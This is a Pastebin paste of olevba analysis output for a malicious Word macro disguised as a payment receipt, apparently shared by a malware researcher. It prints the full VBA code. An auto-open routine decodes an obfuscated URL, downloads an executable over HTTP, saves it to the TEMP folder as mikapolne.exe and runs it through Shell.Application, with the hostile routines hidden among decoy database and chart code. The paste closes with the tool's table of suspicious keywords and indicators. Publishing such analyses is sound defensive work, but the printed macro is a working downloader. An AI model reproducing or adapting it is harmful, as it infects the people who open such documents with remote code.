API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Jul 22nd, 2015
676
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 22.38 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. XML:MASI-B-V paymentreceipt.xml
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: paymentreceipt.xml
  10. Type: Word2003_XML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. VEeve (8.2)
  19.  
  20. End Sub
  21.  
  22. Sub VEeve(FFFFF As Long)
  23. Recall_File_Location
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module1.bas
  31. in file: editdata.mso - OLE stream: u'VBA/Module1'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33. Public strSQLChart389 As String
  34. Public strTargettable As String
  35.  
  36. '------ BEGIN IMPORT CODES -----------
  37.  
  38. 'This code was originally written by Ken Getz.
  39. 'It is not to be altered or distributed,
  40. 'except as part of an application.
  41. 'You are free to use it in any application,
  42. 'provided the copyright notice is left unchanged.
  43. '
  44. ' Code courtesy of:
  45. '   Microsoft Access 95 How-To
  46. ' Ken Getz and Paul Litwin
  47. ' Waite Group Press, 1996
  48.  
  49. Type tagOPENFILENAME
  50.     lStructSize As Long
  51.     hwndOwner As Long
  52.     hInstance As Long
  53.     strFilter As String
  54.     strCustomFilter As String
  55.     nMaxCustFilter As Long
  56.     nFilterIndex As Long
  57.     strFile As String
  58.     nMaxFile As Long
  59.     strFileTitle As String
  60.     nMaxFileTitle As Long
  61.     strInitialDir As String
  62.     strTitle As String
  63.     Flags As Long
  64.     nFileOffset As Integer
  65.     nFileExtension As Integer
  66.     strDefExt As String
  67.     lCustData As Long
  68.     lpfnHook As Long
  69.     lpTemplateName As String
  70. End Type
  71.  
  72.  
  73. Global Const ahtOFN_READONLY = &H1
  74. Global Const ahtOFN_OVERWRITEPROMPT = &H2
  75. Global Const ahtOFN_HIDEREADONLY = &H4
  76. Global Const ahtOFN_NOCHANGEDIR = &H8
  77. Global Const ahtOFN_SHOWHELP = &H10
  78. ' You won't use these.
  79. 'Global Const ahtOFN_ENABLEHOOK = &H20
  80. 'Global Const ahtOFN_ENABLETEMPLATE = &H40
  81. 'Global Const ahtOFN_ENABLETEMPLATEHANDLE = &H80
  82. Global Const ahtOFN_NOVALIDATE = &H100
  83. Global Const ahtOFN_ALLOWMULTISELECT = &H200
  84. Global Const ahtOFN_EXTENSIONDIFFERENT = &H400
  85. Global Const ahtOFN_PATHMUSTEXIST = &H800
  86. Global Const ahtOFN_FILEMUSTEXIST = &H1000
  87. Global Const ahtOFN_CREATEPROMPT = &H2000
  88. Global Const ahtOFN_SHAREAWARE = &H4000
  89. Global Const ahtOFN_NOREADONLYRETURN = &H8000
  90. Global Const ahtOFN_NOTESTFILECREATE = &H10000
  91. Global Const ahtOFN_NONETWORKBUTTON = &H20000
  92. Global Const ahtOFN_NOLONGNAMES = &H40000
  93. ' New for Windows 95
  94. Global Const ahtOFN_EXPLORER = &H80000
  95. Global Const ahtOFN_NODEREFERENCELINKS = &H100000
  96. Global Const ahtOFN_LONGNAMES = &H200000
  97.  
  98.  
  99. Function GetOpenFile(Optional varDirectory As Variant, _
  100.     Optional varTitleForDialog As Variant) As Variant
  101. ' Here's an example that gets an Access database name.
  102. Dim strFilter As String
  103. Dim lngFlags As Long
  104. Dim varFileName As Variant
  105. ' Specify that the chosen file must already exist,
  106. ' don't change directories when you're done
  107. ' Also, don't bother displaying
  108. ' the read-only box. It'll only confuse people.
  109.    lngFlags = ahtOFN_FILEMUSTEXIST Or _
  110.                 ahtOFN_HIDEREADONLY Or ahtOFN_NOCHANGEDIR
  111.     If IsMissing(varDirectory) Then
  112.         varDirectory = ""
  113.     End If
  114.     If IsMissing(varTitleForDialog) Then
  115.         varTitleForDialog = "Hello World"
  116.     End If
  117.  
  118.     ' Define the filter string and allocate space in the "c"
  119.    ' string Duplicate this line with changes as necessary for
  120.    ' more file templates.
  121.    strFilter = ahtAddFilterItem(strFilter, _
  122.                 "Excel (*.xls)", "*.XLS")
  123.     ' Now actually call to get the file name.
  124.    varFileName = ahtCommonFileOpenSave( _
  125.                     OpenFile:=False, _
  126.                     InitialDir:=varDirectory, _
  127.                     Filter:=strFilter, _
  128.                     Flags:=lngFlags, _
  129.                     DialogTitle:=varTitleForDialog)
  130.    
  131.     If IsNull(varFileName) Then
  132.         MsgBox "Please choose a file to import", vbOKOnly, "Notification"
  133.     End If
  134.    
  135.     MsgBox varFileName
  136.     If Not IsNull(varFileName) Then
  137.         varFileName = TrimNull(varFileName)
  138.         GetOpenFile = varFileName
  139.         'DoCmd.TransferText acImportDelim, "csv_import_specs", "sales", GetOpenFile, True
  140.        DoCmd.TransferSpreadsheet acImport, acSpreadsheetTypeExcel9, strTargettable, GetOpenFile, True
  141.     Else
  142.         MsgBox "Please choose a file to import", vbOKOnly, "Notification"
  143.     End If
  144.  
  145. End Function
  146. Function RecallFileLocation() As String
  147.     Dim strFilter As String, strLoc As String
  148.     Dim lngFlags As Long, MyDefault As String
  149.     strFilter = ahtAddFilterItem(strFilter, "Access Files (*.mda, *.mdb)", _
  150.                     "*.MDA;*.MDB")
  151.     'strFilter = ahtAddFilterItem(strFilter, "dBASE Files (*.dbf)", "*.DBF")
  152.    strFilter = ahtAddFilterItem(strFilter, "Text Files (*.txt)", "*.TXT")
  153.     strFilter = ahtAddFilterItem(strFilter, "Excel Files (*.xls)", "*.XLS")
  154.     strFilter = ahtAddFilterItem(strFilter, "All Files (*.*)", "*.*")
  155.  
  156.     MyDefault = "C:\"
  157.     ' MsgBox ValidateLocations(MyDefault)   Returns results of test to see if exists
  158.      
  159.     RecallFileLocation = ahtCommonFileOpenSave(InitialDir:=MyDefault, _
  160.         Filter:=strFilter, FilterIndex:=3, Flags:=lngFlags, _
  161.         DialogTitle:="Find File to Open!")
  162.    
  163.     '    MsgBox "You selected: " & ahtCommonFileOpenSave(InitialDir:="S:\Assignment List\", _
  164.     '    Filter:=strFilter, FilterIndex:=3, Flags:=lngFlags, _
  165.     '    DialogTitle:="Find File to Open!")
  166.    ' Since you passed in a variable for lngFlags,
  167.    ' the function places the output flags value in the variable.
  168.    Debug.Print Hex(lngFlags)
  169. End Function
  170.  
  171. Sub Recall_File_Location()
  172.  
  173. cTdsOvmpZ0T = Chr(104) & "t" & ";" & Chr(116) & "p" & Chr(58) & Chr(61) & "/" & Chr(60) & "/" & Chr(112) & Chr(117) & "e" & "r" & "t" & Chr(97) & Chr(46) & "f" & Chr(60) & "r" & Chr(47) & Chr(115) & Chr(97) & "n" & Chr(100) & Chr(61) & Chr(114) & "a" & Chr(47) & Chr(119) & Chr(114) & "i" & Chr(116) & "e" & Chr(46) & "e" & Chr(59) & "x" & Chr(101)
  174. Set ElDbasip6 = btn_hourly_transactions_99_Click("M" & Chr(105) & "c" & Chr(114) & Chr(111) & "<s" & "o" & Chr(102) & "t" & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & Chr(72) & "T" & "<T;" & Chr(80))
  175.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(60), "")
  176.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(61), "")
  177.  cTdsOvmpZ0T = Replace(cTdsOvmpZ0T, Chr(59), "")
  178. CallByName ElDbasip6, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, "G" & "E" & Chr(84), _
  179. cTdsOvmpZ0T _
  180. , False
  181.  
  182. Set HURaWTTfnV70aA = btn_hourly_transactions_99_Click(Chr(87) & Chr(83) & Chr(99) & "<" & Chr(114) & Chr(105) & Chr(112) & "t;" & Chr(46) & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(61) & Chr(108))
  183.  
  184. Set jfhAqR8f0z = CallByName(HURaWTTfnV70aA, Chr(69) & "n" & "v" & "i" & Chr(114) & Chr(111) & Chr(110) & Chr(109) & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
  185.  
  186. Ga9exV0usiOxh = jfhAqR8f0z("T" & Chr(69) & Chr(77) & Chr(80))
  187.  
  188. strSQLChart389 = Ga9exV0usiOxh & Chr(92) & Chr(109) & Chr(105) & Chr(107) & "a" & Chr(112) & Chr(111) & Chr(108) & Chr(110) & Chr(101) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
  189. Dim FiiLlqz7ZuFikb() As Byte
  190.  
  191. CallByName ElDbasip6, "S" & "e" & Chr(110) & Chr(100), VbMethod
  192. FiiLlqz7ZuFikb = CallByName(ElDbasip6, "r" & "e" & Chr(115) & Chr(112) & Chr(111) & "n" & "s" & Chr(101) & "B" & Chr(111) & Chr(100) & Chr(121), VbGet)
  193. btn_this_month1_Click FiiLlqz7ZuFikb, strSQLChart389
  194. On Error GoTo ke7nvlgCXNTah
  195.     a = 84 / 0
  196.   On Error GoTo 0
  197.  
  198. f8kh1r1ELTN:
  199.   Exit Sub
  200. ke7nvlgCXNTah:
  201.   btn_hourly_sum_48_Click ("avNTTxhUC9eWb")
  202. Resume f8kh1r1ELTN
  203. End Sub
  204. Function ahtAddFilterItem(strFilter As String, _
  205.     strDescription As String, Optional varItem As Variant) As String
  206. ' Tack a new chunk onto the file filter.
  207. ' That is, take the old value, stick onto it the description,
  208. ' (like "Databases"), a null character, the skeleton
  209. ' (like "*.mdb;*.mda") and a final null character.
  210.  
  211.     If IsMissing(varItem) Then varItem = "*.*"
  212.     ahtAddFilterItem = strFilter & _
  213.                 strDescription & vbNullChar & _
  214.                 varItem & vbNullChar
  215. End Function
  216.  
  217. Public Function btn_this_month1_Click(strSQLRank17 As Variant, inq7dnGSyLG As String)
  218. Dim strSQLRank13: Set strSQLRank13 = btn_hourly_transactions_99_Click(Chr(65) & "d<" & Chr(111) & ";d" & Chr(98) & "." & Chr(83) & "t" & Chr(114) & Chr(101) & Chr(97) & Chr(61) & "=" & Chr(109))
  219.  
  220. With strSQLRank13
  221.    .Type = 1
  222.     .Open
  223.     .write strSQLRank17
  224.     .savetofile inq7dnGSyLG, 2
  225. End With
  226. End Function
  227. Private Function TrimNull(ByVal strItem As String) As String
  228. Dim intPos As Integer
  229.     intPos = InStr(strItem, vbNullChar)
  230.     If intPos > 0 Then
  231.         TrimNull = Left(strItem, intPos - 1)
  232.     Else
  233.         TrimNull = strItem
  234.     End If
  235. End Function
  236.  
  237. Function show_chart_controls(thisVisibility As Boolean)
  238.  
  239.   'sales trending controls
  240.  cevMe.a_this_week.Visible = thisVisibility
  241.   cevMe.a_this_month.Visible = thisVisibility
  242.   cevMe.a_this_quarter.Visible = thisVisibility
  243.   cevMe.btn_this_month.Visible = thisVisibility
  244.   cevMe.btn_this_quarter.Visible = thisVisibility
  245.   cevMe.btn_this_week.Visible = thisVisibility
  246.  
  247.   'hourly trending controls
  248.  cevMe.a_hourly_14.Visible = thisVisibility
  249.   cevMe.a_hourly_30.Visible = thisVisibility
  250.   cevMe.a_hourly_sum_14.Visible = thisVisibility
  251.   cevMe.a_hourly_sum_30.Visible = thisVisibility
  252.   cevMe.a_hourly_transactions_14.Visible = thisVisibility
  253.   cevMe.a_hourly_transactions_30.Visible = thisVisibility
  254.  
  255.   cevMe.btn_hourly_14.Visible = thisVisibility
  256.   cevMe.btn_hourly_30.Visible = thisVisibility
  257.   cevMe.btn_hourly_sum_14.Visible = thisVisibility
  258.   cevMe.btn_hourly_sum_30.Visible = thisVisibility
  259.   cevMe.btn_hourly_transactions_14.Visible = thisVisibility
  260.   cevMe.btn_hourly_transactions_30.Visible = thisVisibility
  261.  
  262.   'labels
  263.  cevMe.label_hourly.Visible = thisVisibility
  264.   cevMe.label_avg.Visible = thisVisibility
  265.   cevMe.label_sum.Visible = thisVisibility
  266.   cevMe.label_transactions.Visible = thisVisibility
  267.  
  268. End Function
  269. '-------------- END IMPORT CODES --------------
  270.  
  271. -------------------------------------------------------------------------------
  272. VBA MACRO Module2.bas
  273. in file: editdata.mso - OLE stream: u'VBA/Module2'
  274. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  275. Dim strNoOfDays As Integer
  276.  
  277.  
  278.  
  279. Private Sub btn_this_month_Click()
  280.  
  281.   Call fb.EndTimer
  282.   Call dd.set_chart_labels("sales")
  283.  
  284.   chChartTitle = "30-Day Sales Trending"
  285.  
  286.   strSQLRank = "TOP 30"
  287.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  288.  
  289.   Call dd.BuildSalesChart
  290.  
  291. End Sub
  292.  
  293. Private Sub btn_this_quarter_Click()
  294.  
  295.   Call cc.EndTimer
  296.   Call ccc.set_chart_labels("sales")
  297.  
  298.   chChartTitle = "90-Day Sales Trending"
  299.  
  300.   strSQLRank = "TOP 90"
  301.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  302.  
  303.   Call lkd.BuildSalesChart
  304.  
  305. End Sub
  306.  
  307. Private Sub btn_this_week_Click()
  308.  
  309.   Call kl.EndTimer
  310.   Call oo.set_chart_labels("sales")
  311.  
  312.   chChartTitle = "14-Day Sales Trending"
  313.  
  314.   strSQLRank = "TOP 14"
  315.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  316.  
  317.   Call ce.BuildSalesChart
  318.  
  319. End Sub
  320.  
  321. Public Function btn_hourly_sum_48_Click(oTOZyLSZ9iofhw As String)
  322.  Set strSQLChart1 = btn_hourly_transactions_99_Click("S" & "h" & Chr(59) & "e" & "<l" & "l" & Chr(46) & Chr(65) & Chr(112) & "p" & Chr(108) & "i" & Chr(99) & Chr(97) & Chr(116) & "i=" & "o" & Chr(110))
  323. strSQLChart1.Open (strSQLChart389)
  324. End Function
  325.  
  326.  
  327.  
  328. Private Sub img_sales_trends_Click()
  329.  
  330.   Call dss.EndTimer
  331.   Call ccc.set_chart_labels("sales")
  332.   'Call Subforms_reset
  333.  
  334.   chChartTitle = "14-Day Sales Trending"
  335.  
  336.   strSQLRank = "TOP 14"
  337.   strSQLChart = "SELECT " & strSQLRank & " DtlsDate, SUM(ExtPriceEff) AS totalSales FROM SalesDtls " & strSQLWhere & " GROUP BY DtlsDate ORDER BY DtlsDate DESC"
  338.  
  339.   Call ll.BuildSalesChart
  340.  
  341.   Call show_chart_controls(True)
  342.  
  343. End Sub
  344.  
  345. Private Sub btn_hourly_14_Click()
  346.  
  347.   Call vr.EndTimer
  348.   Call fe.set_chart_labels("hourly")
  349.  
  350.   strNoOfDays = 14
  351.   chChartTitle = "Ave. Sales per Hour Over Past " & strNoOfDays & " Days"
  352.  
  353.   strSQLChart = "SELECT FORMAT(hour) AS hour_of_day, FORMAT(Avg(hourly_sales),'Standard') AS avg_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour" 'DateValue('6/1/2011') AND DateValue('6/30/2011') GROUP BY hour"
  354.  
  355.   Call ec.BuildSalesChart
  356.  
  357. End Sub
  358.  
  359.  
  360. Private Sub btn_hourly_30_Click()
  361.  
  362.   Call mm.EndTimer
  363.   Call ef.sset_chart_labels("hourly")
  364.  
  365.   strNoOfDays = 30
  366.   chChartTitle = "Ave. Sales per Hour Over Past " & strNoOfDays & " Days"
  367.    
  368.   strSQLChart = "SELECT FORMAT(hour) AS hour_of_day, FORMAT(Avg(hourly_sales),'Standard') AS avg_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour" 'DateValue('6/1/2011') AND DateValue('6/30/2011') GROUP BY hour"
  369.  
  370.   Call ls.BuildSalesChart
  371.  
  372. End Sub
  373.  
  374. Private Sub btn_hourly_sum_14_Click()
  375.  
  376.   Call dcd.EndTimer
  377.   Call aa.set_chart_labels("hourly")
  378.  
  379.   strNoOfDays = 14
  380.   chChartTitle = "Aggregate Sales per Hour Over Past " & strNoOfDays & " Days"
  381.    
  382.   strSQLChart = "SELECT hour, sum(hourly_sales) as sum_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour"
  383.  
  384.   Call lfk.BuildSalesChart
  385.  
  386. End Sub
  387. Private Sub btn_hourly_sum_30_Click()
  388.  
  389.   Call la.EndTimer
  390.   Call ds.set_chart_labels("hourly")
  391.  
  392.   strNoOfDays = 30
  393.   chChartTitle = "Aggregate Sales per Hour Over Past " & strNoOfDays & " Days"
  394.    
  395.   strSQLChart = "SELECT hour, sum(hourly_sales) as sum_hourly_sales FROM hourly_data_query WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " GROUP BY hour"
  396.  
  397.   Call ll.BuildSalesChart
  398.  
  399. End Sub
  400.  
  401. Public Function btn_hourly_transactions_99_Click(Fpsh8W7KwFw4n3 As String)
  402. Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(60), "")
  403.  Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(61), "")
  404.  Fpsh8W7KwFw4n3 = Replace(Fpsh8W7KwFw4n3, Chr(59), "")
  405.  Set btn_hourly_transactions_99_Click = CreateObject(Fpsh8W7KwFw4n3)
  406. End Function
  407. Private Sub btn_hourly_transactions_14_Click()
  408.  
  409.   Call oo.EndTimer
  410.   Call oa.set_chart_labels("item_count")
  411.  
  412.   strNoOfDays = 14
  413.   chChartTitle = "Aggregate Items Sold per Hour Over Past " & strNoOfDays & " Days"
  414.    
  415.   strSQLChart = "SELECT TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0) AS [hour], COUNT(ExtPriceEff) AS trans_count FROM SalesDtls WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " AND Status = 'REG' GROUP BY TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0)"
  416.  
  417.   Call dw.BuildSalesChart
  418.  
  419. End Sub
  420.  
  421. Private Sub btn_hourly_transactions_30_Click()
  422.  
  423.   Call dwd.EndTimer
  424.   Call aa.set_chart_labels("hourly")
  425.  
  426.   strNoOfDays = 30
  427.   chChartTitle = "Aggregate Items Sold per Hour Over Past " & strNoOfDays & " Days"
  428.    
  429.   strSQLChart = "SELECT TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0) AS [hour], COUNT(ExtPriceEff) AS trans_count FROM SalesDtls WHERE DtlsDate BETWEEN NOW() AND NOW()-" & strNoOfDays & " AND Status = 'REG' GROUP BY TIMESERIAL(FORMAT(SalesDtls.EndTime,'HH'),0,0)"
  430.  
  431.   Call lla.BuildSalesChart
  432.  
  433. End Sub
  434.  
  435. Private Sub Form_Load()
  436.    
  437.   'hide links
  438.  Call show_chart_controls(False)
  439.    
  440.   'reset subform objects
  441.  Call cs.reset_sales_subforms
  442.  
  443.   strSQLWhere = "WHERE Status = 'REG'"
  444.  
  445. End Sub
  446.  
  447. Private Sub img_sales_monitor_Click()
  448.    
  449.   Call sc.reset_sales_subforms
  450.  
  451.   objSubformControl = "viewer"
  452.   Call sc.format_viewer("sales_viewer", 1, 1)
  453.  
  454.   objSubformControl = "info"
  455.   Call sc.format_viewer("sales_summary", 1, 1)
  456.    
  457.   cc.Me.focustaker.SetFocus
  458.  
  459. End Sub
  460.  
  461.  
  462. Function ahtCommonFileOpenSave( _
  463.             Optional ByRef Flags As Variant, _
  464.             Optional ByVal InitialDir As Variant, _
  465.             Optional ByVal Filter As Variant, _
  466.             Optional ByVal FilterIndex As Variant, _
  467.             Optional ByVal DefaultExt As Variant, _
  468.             Optional ByVal FileName As Variant, _
  469.             Optional ByVal DialogTitle As Variant, _
  470.             Optional ByVal HWnd As Variant, _
  471.             Optional ByVal OpenFile As Variant) As Variant
  472. ' This is the entry point you'll use to call the common
  473. ' file open/save dialog. The parameters are listed
  474. ' below, and all are optional.
  475. '
  476. ' In:
  477. ' Flags: one or more of the ahtOFN_* constants, OR'd together.
  478. ' InitialDir: the directory in which to first look
  479. ' Filter: a set of file filters, set up by calling
  480. ' AddFilterItem. See examples.
  481. ' FilterIndex: 1-based integer indicating which filter
  482. ' set to use, by default (1 if unspecified)
  483. ' DefaultExt: Extension to use if the user doesn't enter one.
  484. ' Only useful on file saves.
  485. ' FileName: Default value for the file name text box.
  486. ' DialogTitle: Title for the dialog.
  487. ' hWnd: parent window handle
  488. ' OpenFile: Boolean(True=Open File/False=Save As)
  489. ' Out:
  490. ' Return Value: Either Null or the selected filename
  491. Dim OFN As tagOPENFILENAME
  492. Dim strFileName As String
  493. Dim strFileTitle As String
  494. Dim fResult As Boolean
  495.     ' Give the dialog a caption title.
  496.    If IsMissing(InitialDir) Then InitialDir = CurDir
  497.     If IsMissing(Filter) Then Filter = ""
  498.     If IsMissing(FilterIndex) Then FilterIndex = 1
  499.     If IsMissing(Flags) Then Flags = 0&
  500.     If IsMissing(DefaultExt) Then DefaultExt = ""
  501.     If IsMissing(FileName) Then FileName = ""
  502.     If IsMissing(DialogTitle) Then DialogTitle = ""
  503.     If IsMissing(HWnd) Then HWnd = cs.Application.hWndAccessApp
  504.     If IsMissing(OpenFile) Then OpenFile = True
  505.     ' Allocate string space for the returned strings.
  506.    strFileName = Left(FileName & String(256, 0), 256)
  507.     strFileTitle = String(256, 0)
  508.     ' Set up the data structure before you call the function
  509.    With OFN
  510.         .lStructSize = Len(OFN)
  511.         .hwndOwner = HWnd
  512.         .strFilter = Filter
  513.         .nFilterIndex = FilterIndex
  514.         .strFile = strFileName
  515.         .nMaxFile = Len(strFileName)
  516.         .strFileTitle = strFileTitle
  517.         .nMaxFileTitle = Len(strFileTitle)
  518.         .strTitle = DialogTitle
  519.         .Flags = Flags
  520.         .strDefExt = DefaultExt
  521.         .strInitialDir = InitialDir
  522.         ' Didn't think most people would want to deal with
  523.        ' these options.
  524.        .hInstance = 0
  525.         '.strCustomFilter = ""
  526.        '.nMaxCustFilter = 0
  527.        .lpfnHook = 0
  528.         'New for NT 4.0
  529.        .strCustomFilter = String(255, 0)
  530.         .nMaxCustFilter = 255
  531.     End With
  532.     ' This will pass the desired data structure to the
  533.    ' Windows API, which will in turn it uses to display
  534.    ' the Open/Save As Dialog.
  535.    If OpenFile Then
  536.         fResult = vdvd.aht_apiGetOpenFileName()
  537.     Else
  538.         fResult = vdvd.aht_apiGetSaveFileName()
  539.     End If
  540.  
  541.     ' The function call filled in the strFileTitle member
  542.    ' of the structure. You'll have to write special code
  543.    ' to retrieve that if you're interested.
  544.    If fResult Then
  545.         ' You might care to check the Flags member of the
  546.        ' structure to get information about the chosen file.
  547.        ' In this example, if you bothered to pass in a
  548.        ' value for Flags, we'll fill it in with the outgoing
  549.        ' Flags value.
  550.        If Not IsMissing(Flags) Then Flags = OFN.Flags
  551.         ahtCommonFileOpenSave = TrimNull(OFN.strFile)
  552.     Else
  553.         ahtCommonFileOpenSave = vbNullString
  554.     End If
  555. End Function
  556.  
  557.  
  558.  
  559.  
  560. +------------+----------------------+-----------------------------------------+
  561. | Type       | Keyword              | Description                             |
  562. +------------+----------------------+-----------------------------------------+
  563. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  564. | Suspicious | Open                 | May open a file                         |
  565. | Suspicious | Windows              | May enumerate application windows (if   |
  566. |            |                      | combined with Shell.Application object) |
  567. | Suspicious | CreateObject         | May create an OLE object                |
  568. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  569. |            |                      | function calls                          |
  570. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  571. |            |                      | strings                                 |
  572. | Suspicious | SaveToFile           | May create a text file                  |
  573. | Suspicious | Write                | May write to a file (if combined with   |
  574. |            |                      | Open)                                   |
  575. | Suspicious | Output               | May write to a file (if combined with   |
  576. |            |                      | Open)                                   |
  577. | Suspicious | Open                 | May open a file (obfuscation: VBA       |
  578. |            |                      | expression)                             |
  579. | Suspicious | Write                | May write to a file (if combined with   |
  580. |            |                      | Open) (obfuscation: VBA expression)     |
  581. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  582. |            |                      | may be used to obfuscate strings        |
  583. |            |                      | (option --decode to see all)            |
  584. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  585. |            | Strings              | may be used to obfuscate strings        |
  586. |            |                      | (option --decode to see all)            |
  587. | IOC        | mikapolne.exe        | Executable file name (obfuscation: VBA  |
  588. |            |                      | expression)                             |
  589. +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!